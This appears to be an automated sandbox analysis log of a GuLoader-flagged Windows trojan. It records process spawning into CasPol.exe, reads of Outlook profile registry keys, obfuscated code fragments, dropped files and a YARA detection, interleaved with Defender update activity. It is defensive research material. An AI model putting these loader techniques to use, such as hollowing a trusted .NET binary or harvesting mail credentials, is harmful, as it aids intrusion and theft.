Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	ReversingLabs: Detection: 22%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe"
Source: unknown	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe "C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-e428c3f6.exe" /q WD
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe /stub 1.1.18500.10 /payload 1.367.502.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-e428c3f6.exe /q WD
Source: unknown	Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\3FCB5F68-CD33-FF2F-34AE-798C9A7026D4.man
Source: C:\Windows\System32\wevtutil.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\3FCB5F68-CD33-FF2F-34AE-798C9A7026D4.man "/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll" "/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll" "/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll"
Source: C:\Windows\System32\wevtutil.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpengine.exe C:\ProgramData\Microsoft\Windows Defender\Scans\\MpPayloadData\mpengine.exe
Source: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpengine.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-60574f34.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe /stub 1.1.18500.10 /payload 4.18.2203.5 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-60574f34.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: unknown	Process created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\NisSrv.exe C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\NisSrv.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe"	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe /stub 1.1.18500.10 /payload 1.367.502.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-e428c3f6.exe /q WD	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe /stub 1.1.18500.10 /payload 4.18.2203.5 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-60574f34.exe	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	1_2_0040352D
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44DF118 LookupPrivilegeValueW,GetCurrentProcess,CloseHandle,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,	7_2_00007FF6F44DF118
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A1F118 LookupPrivilegeValueW,GetCurrentProcess,CloseHandle,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,	19_2_00007FF7D3A1F118

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

File created: C:\Users\user\AppData\Local\Temp\nsc7A1A.tmp

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Code function: 1_2_004021AA CoCreateInstance,

1_2_004021AA

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Code function: 1_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

1_2_0040498A

Source: mpam-60574f34.exe, 00000010.00000003.18737392209.0000016C07BA1000.00000004.00000020.00020000.00000000.sdmp, mpam-60574f34.exe, 00000010.00000003.18605566116.0000016C07991000.00000004.00000020.00020000.00000000.sdmp, mpam-60574f34.exe, 00000010.00000003.18719421934.0000016C079A1000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18762644734.000001F8CDE43000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Select ActionPA6Block executable content from email client and webmail;Block all Office applications from creating child processes:Block Office applications from creating executable contentBBlock Office applications from injecting code into other processesIBlock JavaScript or VBScript from launching downloaded executable content1Block execution of potentially obfuscated scripts'Block Win32 API calls from Office macro`Block executable files from running unless they meet a prevalence, age, or trusted list criteria*Use advanced protection against ransomwareYBlock credential stealing from the Windows local security authority subsystem (lsass.exe)@Block process creations originating from PSExec and WMI commands8Block untrusted and unsigned processes that run from USBJBlock only Office communication applications from creating child processes0Block Adobe Reader from creating child processesPA)Antimalware engine has stopped responding

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe

Code function: 7_2_00007FF6F448B1C4 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetLastError,Process32FirstW,GetLastError,Process32NextW,GetLastError,FindCloseChangeNotification,CloseHandle,

7_2_00007FF6F448B1C4

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8572:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4968:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:9144:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5416:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4968:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5416:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8572:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:9144:304:WilStaging_02

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\dado

Jump to behavior

Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: ConfigSecurityPolicy.pdb source: MpSigStub.exe, 00000013.00000003.18750149036.000001F8CDE37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpAzSubmit.pdb source: MpSigStub.exe, 00000013.00000003.18751240013.000001F8CDE3B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: NisSrv.pdb source: NisSrv.exe.16.dr
Source:	Binary string: MpRTP.pdb source: mpam-60574f34.exe, 00000010.00000003.18535264051.0000016C07983000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18754931951.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WdBoot.pdb source: mpam-60574f34.exe, 00000010.00000003.18737392209.0000016C07BA1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpAdlStub.pdb source: mpam-e428c3f6.exe, 00000003.00000000.18199651604.00007FF74E73F000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: WdFilter.pdbGCTL source: mpam-60574f34.exe, 00000010.00000003.18737392209.0000016C07BA1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpAzSubmit.pdbGCTL source: MpSigStub.exe, 00000013.00000003.18751240013.000001F8CDE3B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpSenseComm.pdbGCTL source: MpSigStub.exe, 00000013.00000003.18755428699.000001F8CDE4C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpClient.pdb source: MpSigStub.exe, 00000007.00000003.18393894759.000001DE0F544000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WdDevFlt.pdbGCTL source: mpam-60574f34.exe, 00000010.00000003.18737392209.0000016C07BA1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpDetours.pdbGCTL source: mpam-60574f34.exe, 00000010.00000003.18531267121.0000016C07983000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18753195690.000001F8CDE3B000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18761615816.000001F8CDE42000.00000004.00000020.00020000.00000000.sdmp, MpDetours.dll0.16.dr
Source:	Binary string: ProtectionManagement.pdbGCTL source: mpam-60574f34.exe, 00000010.00000003.18544926204.0000016C07983000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18758774396.000001F8CDE41000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpSigStub.pdbGCTL source: MpSigStub.exe, 00000007.00000003.18401631614.000001DE0F547000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000007.00000000.18387090699.00007FF6F4507000.00000002.00000001.01000000.0000000A.sdmp, MpSigStub.exe, 00000007.00000002.18489828227.00007FF6F4507000.00000002.00000001.01000000.0000000A.sdmp, MpSigStub.exe, 00000013.00000000.18742830508.00007FF7D3A47000.00000002.00000001.01000000.0000000F.sdmp, MpSigStub.exe, 00000013.00000002.18819564832.00007FF7D3A47000.00000002.00000001.01000000.0000000F.sdmp, MpSigStub.exe, 00000013.00000003.18755716938.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpCommu.pdbGCTL source: MpSigStub.exe, 00000013.00000003.18752568256.000001F8CDE3B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpUxAgent.pdb source: mpam-60574f34.exe, 00000010.00000003.18542110345.0000016C07983000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18757096877.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WdFilter.pdb source: mpam-60574f34.exe, 00000010.00000003.18737392209.0000016C07BA1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ProtectionManagement.pdb source: mpam-60574f34.exe, 00000010.00000003.18544926204.0000016C07983000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18758774396.000001F8CDE41000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpUxAgent.pdbGCTL source: mpam-60574f34.exe, 00000010.00000003.18542110345.0000016C07983000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18757096877.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WdNisDrv.pdb source: mpam-60574f34.exe, 00000010.00000003.18739844648.0000016C079A3000.00000004.00000020.00020000.00000000.sdmp, mpam-60574f34.exe, 00000010.00000003.18737392209.0000016C07BA1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MsMpEng.pdbGCTL source: MpSigStub.exe, 00000013.00000003.18757615927.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpSigStub.pdb source: MpSigStub.exe, 00000007.00000003.18401631614.000001DE0F547000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000007.00000000.18387090699.00007FF6F4507000.00000002.00000001.01000000.0000000A.sdmp, MpSigStub.exe, 00000007.00000002.18489828227.00007FF6F4507000.00000002.00000001.01000000.0000000A.sdmp, MpSigStub.exe, 00000013.00000000.18742830508.00007FF7D3A47000.00000002.00000001.01000000.0000000F.sdmp, MpSigStub.exe, 00000013.00000002.18819564832.00007FF7D3A47000.00000002.00000001.01000000.0000000F.sdmp, MpSigStub.exe, 00000013.00000003.18755716938.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpAdlElvtStub.pdb source: mpam-60574f34.exe, 00000010.00000002.18824267770.00007FF700EDF000.00000002.00000001.01000000.0000000E.sdmp, mpam-60574f34.exe, 00000010.00000000.18501623235.00007FF700EDF000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: MpOAV.pdb source: mpam-60574f34.exe, 00000010.00000003.18533279750.0000016C07983000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18754550374.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp, MpOAV.dll0.16.dr
Source:	Binary string: MpUpdate.pdbGCTL source: MpSigStub.exe, 00000013.00000003.18756735348.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpCmdRun.pdbGCTL source: mpam-60574f34.exe, 00000010.00000003.18558489914.0000016C07986000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18752027678.000001F8CDE3B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpRTP.pdbGCTL source: mpam-60574f34.exe, 00000010.00000003.18535264051.0000016C07983000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18754931951.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpAdlElvtStub.pdbGCTL source: mpam-60574f34.exe, 00000010.00000002.18824267770.00007FF700EDF000.00000002.00000001.01000000.0000000E.sdmp, mpam-60574f34.exe, 00000010.00000000.18501623235.00007FF700EDF000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: MpOAV.pdbGCTL source: mpam-60574f34.exe, 00000010.00000003.18533279750.0000016C07983000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18754550374.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp, MpOAV.dll0.16.dr
Source:	Binary string: MpDetoursCopyAccelerator.pdb source: MpSigStub.exe, 00000013.00000003.18761941166.000001F8CDE42000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpCmdRun.pdb source: mpam-60574f34.exe, 00000010.00000003.18558489914.0000016C07986000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18752027678.000001F8CDE3B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ConfigSecurityPolicy.pdbGCTL source: MpSigStub.exe, 00000013.00000003.18750149036.000001F8CDE37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpCopyAccelerator.pdbGCTL source: MpSigStub.exe, 00000013.00000003.18761414141.000001F8CDE42000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18752921990.000001F8CDE3B000.00000004.00000020.00020000.00000000.sdmp, MpCopyAccelerator.exe0.16.dr
Source:	Binary string: WdNisDrv.pdbGCTL source: mpam-60574f34.exe, 00000010.00000003.18739844648.0000016C079A3000.00000004.00000020.00020000.00000000.sdmp, mpam-60574f34.exe, 00000010.00000003.18737392209.0000016C07BA1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpDlpCmd.pdbGCTL source: mpam-60574f34.exe, 00000010.00000003.18560328758.0000016C07986000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18753508768.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp, MpDlpCmd.exe.16.dr
Source:	Binary string: MpDetours.pdb source: mpam-60574f34.exe, 00000010.00000003.18531267121.0000016C07983000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18753195690.000001F8CDE3B000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18761615816.000001F8CDE42000.00000004.00000020.00020000.00000000.sdmp, MpDetours.dll0.16.dr
Source:	Binary string: WdDevFlt.pdb source: mpam-60574f34.exe, 00000010.00000003.18737392209.0000016C07BA1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpSenseComm.pdb source: MpSigStub.exe, 00000013.00000003.18755428699.000001F8CDE4C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpCommu.pdb source: MpSigStub.exe, 00000013.00000003.18752568256.000001F8CDE3B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpDetoursCopyAccelerator.pdbGCTL source: MpSigStub.exe, 00000013.00000003.18761941166.000001F8CDE42000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpAdlStub.pdbGCTL source: mpam-e428c3f6.exe, 00000003.00000000.18199651604.00007FF74E73F000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: MpPayload.pdbGCTL source: mpengine.exe, 0000000C.00000002.18479667093.00007FF71C58B000.00000002.00000001.01000000.0000000D.sdmp, mpengine.exe, 0000000C.00000000.18476339200.00007FF71C58B000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: WdBoot.pdbGCTL source: mpam-60574f34.exe, 00000010.00000003.18737392209.0000016C07BA1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: NisSrv.pdbGCTL source: NisSrv.exe.16.dr
Source:	Binary string: MpDlpCmd.pdb source: mpam-60574f34.exe, 00000010.00000003.18560328758.0000016C07986000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18753508768.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp, MpDlpCmd.exe.16.dr
Source:	Binary string: MsMpEng.pdb source: MpSigStub.exe, 00000013.00000003.18757615927.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpCopyAccelerator.pdb source: MpSigStub.exe, 00000013.00000003.18761414141.000001F8CDE42000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18752921990.000001F8CDE3B000.00000004.00000020.00020000.00000000.sdmp, MpCopyAccelerator.exe0.16.dr
Source:	Binary string: MpClient.pdbGCTL source: MpSigStub.exe, 00000007.00000003.18393894759.000001DE0F544000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WaaSMedicSvc.pdb source: waasmedic.20220526_155057_892.etl.23.dr
Source:	Binary string: MpUpdate.pdb source: MpSigStub.exe, 00000013.00000003.18756735348.000001F8CDE3D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpPayload.pdb source: mpengine.exe, 0000000C.00000002.18479667093.00007FF71C58B000.00000002.00000001.01000000.0000000D.sdmp, mpengine.exe, 0000000C.00000000.18476339200.00007FF71C58B000.00000002.00000001.01000000.0000000D.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000001.00000002.18483403549.0000000002A10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.18323333088.0000000000F30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_6F3D30C0 push eax; ret	1_2_6F3D30EE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A146B1 push ebp; retn C24Ch	1_2_02A1473F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A19BED push E3A3F1BDh; ret	1_2_02A19BF3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1377E push edx; iretd	1_2_02A137E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A21891 push edx; ret	1_2_02A21BE3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A168F4 push ds; iretd	1_2_02A168F5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1BC6E push 85C0069Dh; ret	1_2_02A1BC74
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A16561 push FFFFFF85h; retf	1_2_02A1658F
Source: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpengine.exe	Code function: 12_2_00007FF71C583084 pushfq ; retf	12_2_00007FF71C583218

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Code function: 1_2_6F3D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

1_2_6F3D1BFF

Source: HPSUPD-Win32Exe.exe.1.dr

Static PE information: 0x8CC4634B [Wed Nov 2 06:25:15 2044 UTC]

Source: vm3ddevapi64-debug.dll.1.dr	Static PE information: section name: .didat
Source: vm3ddevapi64-debug.dll.1.dr	Static PE information: section name: .gehcont
Source: vm3ddevapi64-debug.dll.1.dr	Static PE information: section name: _RDATA
Source: lgpllibs.dll.1.dr	Static PE information: section name: .00cfg
Source: WdBoot.sys.16.dr	Static PE information: section name: GFIDS
Source: WdDevFlt.sys.16.dr	Static PE information: section name: GFIDS
Source: WdFilter.sys.16.dr	Static PE information: section name: GFIDS
Source: WdNisDrv.sys.16.dr	Static PE information: section name: GFIDS
Source: MpClient.dll.16.dr	Static PE information: section name: .didat
Source: MpCommu.dll.16.dr	Static PE information: section name: .didat

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Drivers\WdBoot.sys	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Drivers\WdDevFlt.sys	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Drivers\WdFilter.sys	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Drivers\WdNisDrv.sys	Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\mpasbase.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\mpasdlta.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\mpavbase.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\mpavdlta.vdm	Jump to dropped file

Source: C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{EBBB10C2-099A-4A41-A364-F566D3127AB4}\MpKslDrv.sys

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MpKsl1c70f6d2\Parameters\Wdf

Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe

